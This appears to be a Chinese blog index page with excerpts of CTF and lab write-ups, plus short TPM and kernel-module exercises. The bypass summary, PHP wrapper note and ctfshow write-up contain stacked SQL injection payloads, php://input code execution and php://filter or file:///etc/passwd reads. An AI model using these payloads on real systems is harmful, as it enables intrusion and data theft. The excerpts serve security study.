踢PM😎😋
壹、设计需求TPM程序设计基础:可信平台模块(TPM)是当今计算机中安装率越来越高的一个模块。其作用是通过提供一些密码学功能来提高系统的安全性。本项目主要是对其的简单应用实践,目标是编程撰写一个对系统硬件环境进行验证或安全通信的程序。
贰、环境要求|前置1、首先要确保你的Visual Studio 2022是最新版本的,everything搜索Visual Studio Install。2、然后进入提供的项目,正常一打开就会提示是否更新,更新就是了。3、首先你得把这个项目跑起来,Ctrl+b后触发“生成”(Build)命令,将项目编译成可执行文件,编译成功会生成一个bin目录,建议是调成32位的吧。随后在确保开启了tpm模拟环境(Simulator.exe)运行即可。这样就成功跑起来了,接下来就是我对于此项目的一些改动以及一些思路想法
叄、基于hash实现c-s的通讯安全性检测主要思路(莫超,否则百分百哦):假设客户端是发送方,服务器端是接收方,那么客户端得把消息以及自消息摘要一起发送。服务器端接收到后,得把收到的消息做hash,再和发送过来的摘要对比,因为hash的雪崩效应,即使消息 ...
CFS内网渗透三层内网漫游
三层漫游,ctf获取三个flag。来源:2019某CTF线下赛真题内网结合WEB攻防题库,涉及WEB攻击,内网代理路由等技术,每台服务器存在一个Flag,获取每一个Flag对应一个积分,获取三个Flag结束。
壹、网络|环境配置三层漫游环境(从xiaodisec搬运的):kali:192.168.1.130target1:centos:192.168.1.129\192.168.22.129target2:ubuntu:192.168.22.128\192.168.33.129target3:win7:192.168.33.33配置多几块vmnet网卡即可。参考:https://blog.csdn.net/qq_61237064/article/details/125602997
centos配置宝塔若不配置的话,后面kali就访问不了80端口,也就是说连门槛都进不了(究其本质就是别人的环境,你在自己的虚拟环境下肯定要自己配)。宝塔后台登陆地址及密码:地址:http://192.168.1.129:8888/a768f109/账号:eaj3yhsl密码:41bb8fee加上你自己的配置 ...
Lynn's Tasks😍
靶机:192.168.8.2(CentOS);192.168.8.60(win7)攻击机:192.168.8.128(kali)
前期工作|信息收集开启两台靶机192.168.8.2:192.168.8.60:
判断受害主机ip由于我们不知道靶机的ip,我们先nmap扫一下
1nmap -sP 192.168.8.0/24
扫到如下存活主机ip经过排查,.60|.2这两台是受害靶机。打开看一下,192.168.8.2:192.168.8.60:大致:ip为.60这台主机是个人主机?,ip为.2这台主机是web服务器
192.168.8.2信息收集端口扫描按照上述思路,先对192.168.8.2这台主机进行端口扫描
1nmap -sT -sC -sV -O 192.168.8.2
熟悉的老朋友:22|80
目录扫描以防万一,再进行目录扫描扫出reports目录,看了一下里面的文件,并无利用价值。再次以防万一,继续换工具扫发现用dirb、dirsearch、nikto等工具扫还是只有reports这个目录。
web渗透针对80端口就是之前的主界面,有三个超链接,前两个是邮箱,点击’h ...
Linux内核小编程😎
大概是这样的一个要求:编写一个内核模块,可以记录访问痕迹。
思路内核编程,在my_module.c中编写下列代码,实现允许定义一个受保护文件列表的功能,然后“嵌入”内核中,重新编译即可。
具体实现一、编写代码:list.c
12345678910111213141516171819202122232425262728293031323334353637383940414243#include <linux/init.h>#include <linux/module.h>#include <linux/fs.h>#include <linux/slab.h>#include <linux/list.h>#include <linux/string.h>MODULE_LICENSE("GPL");// 定义一个简单的受保护文件列表static char *protected_files[] = {"/etc/passwd", "/etc/shadow" ...
Web安全(目前)绕过|姿势总结🤞
最近疯狂刷题,但是发现效果微乎其微,静下来思考,😔需要沉淀,趁我还记得,我想把一些做题遇到的绕过|思路记录下来
SQL注入一、正则过滤select等函数1preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject);
绕过思路堆叠注入爆库
11';show databases;#
爆表
11';show tables;#
爆某表的列
11';show columns from table;#
爆数据(select被过滤情况下失效)
11';select flag from table;#
堆叠注入+handler前面的操作与上面相同,爆数据时
121';HANDLER `1919810931114514` OPEN;HANDLER `1919810931114514` READ next;HANDLER `1919810931114514` CLOSE;##``包裹的是一个纯数字表名。
堆叠注入 ...
php伪协议
目前常用:1、php://input存在文件包含:
1234<?phperror_reporting(0);include($_GET['filename']);?>
那么可以
1?filename=php://input
然后post传递要执行的php代码,如
1<?php system("ls");?>
文件包含配合伪协议实现任意代码|命令执行。2、php://filter读取文件,当存在文件包含时比如
12$file=key.php;include($file);
就可以
1?filename=php://filter/read=convert.base64-encode/resource=key.php
进行读取这个包含的文件。3、file://访问本地文件系统
1?filename=file:///etc/passwd
内网安全
内网安全|域横向|工作组|局域网探针
内网|基本概念基本名词1、DMZ区,即隔离区或非军事化区,是内网和外网间的缓冲区,用于放置一些必须公开的服务器,如web服务器。在保护了内部网络的同时,解决了安装防火墙后外部网络的访问用户不能访问内部网络服务器的问题。2、工作组(Work Group)是局域网中的一个概念。它是最常见最简单最普通的资源管理模式,就是将不同的电脑按功能分别列入不同的组中,以方便管理,适合小型网络(不需要域管理器)。3、域环境:和工作组类似,但是由域控制器(DC)–相当于root,统一管理,更适合大型网络域环境不等于局域网。4、活动目录(AD):相当于功能主机,域内实现什么功能由此管理。5、单域、父域、子域;父域、子域这两个概念在多域情况下会产生。6、域数、域森林基本认知1、Linux域渗透问题Linux实现域的功能需要安装LDAP,功能不如域强且技术要求高,较少被使用,所以大部分是用win server实现域的功能。2、局域网技术适用问题有些局域网内的攻击方法在域内不生效域通常指的是互联网上的一个区域,而局域网是指一个特定地理区域内的网络。因此,域和局域网并不等同。域 ...
ctfshow|Recording
web3|文件包含开启靶机,第一眼确定存在文件包含。看见文件包含,就要想到使用php伪协议https://blog.csdn.net/m0_56107268/article/details/127760614这里常用:php://input。简单来说就是当$_GET参数被包含时,并且我们可以自由控制$_GET参数的输入,就能将$_POST 发送的php代码执行。前提:enctype不等于”multipart/form-data”时,可以使用php://input来获取原始请求的数据,当enctype等于”multipart/form-data”时php://input是无效的。所以这里,我们先试一下打印phpinfo。成功打印,然后我们尝试直接命令执行列出目录。post中
1<?php system("ls")?>
直接爆出一个类似于flag的文件那我们直接读取即可成功获取flag。
web4|文件包含|日志注入开启靶机,怎么和上一题一样?反复确认,先尝试上一道题的方法,提示 ...
billu
时隔一个月,失踪人口回归(bushi,这么久没碰过靶机,今天我们来碰一下靶机。靶机:billu攻击机:kali
一、前期工作|信息收集开启靶机,是如下的一个界面。
判断受害主机ip由于我们不知道靶机的ip,我们先nmap扫一下
1nmap -sP 192.168.200.0/24
扫到如下存活主机ip经过测试,192.168.200.6这个是目的靶机,打开,显示如下界面
具体扫描既然找到了目的靶机,那么我们先对其进行nmap扫描先
1nmap -sS -sV -A -n 192.168.200.6
对我来说有用处的:22|80.
二、web渗透SQL注入得到如上信息,我们先进行web渗透,我们先试试sql注入,因为提示”Show me your SQLI skills”。
1231'1' or 1=1#1 or 1=1#
以上payload全在用户名处输入,密码随便输。但是无一例外,全都提示”try again”。再使用sqlmal尝试一下
1sqlmap -u "http://192.168.200.6/index.php?un=1&ps= ...